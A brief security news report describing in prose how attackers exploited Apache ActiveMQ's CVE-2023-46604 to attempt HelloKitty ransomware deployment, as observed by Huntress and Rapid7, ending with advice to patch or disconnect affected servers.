Reports have surfaced regarding attempted exploits targeting vulnerable instances of Apache ActiveMQ, leveraging CVE-2023-46604 to achieve remote code execution (RCE). Both Huntress and Rapid7 have reported exploitation activity, with Huntress tracing the earliest signs of intrusion back to October 10, 2023, and Rapid7 responding to threat activity on October 27, 2023.
Investigations by both security firms revealed similar attack behaviors. The attackers initiated their activities with Java.exe calling the CMD scripting interpreter to run Msiexec, followed by downloading and installing MSI files (or renamed MSI files). However, due to the presence of responding security agents on the compromised hosts, the file downloads failed to install.
Notably, Rapid7 reported "more than half a dozen unsuccessful attempts to encrypt assets," describing the threat actor's activity as "somewhat clumsy." Further analysis of the dropped payloads by Rapid7 uncovered encoded .NET payloads with ransomware capabilities to stop running processes, appending files with a .locked extension and others. As part of the ransom note, attribution of the HelloKitty ransomware was made by identifying the email address service@hellokittycat[.]online, intended for communication purposes.
While Huntress and Rapid7 reported foiled attempts of encryption or further nefarious activities following the initial infection, affected Apache ActiveMQ instances are strongly advised to apply patches promptly. If patching is not immediately feasible, it is recommended to disable internet access to mitigate potential impact.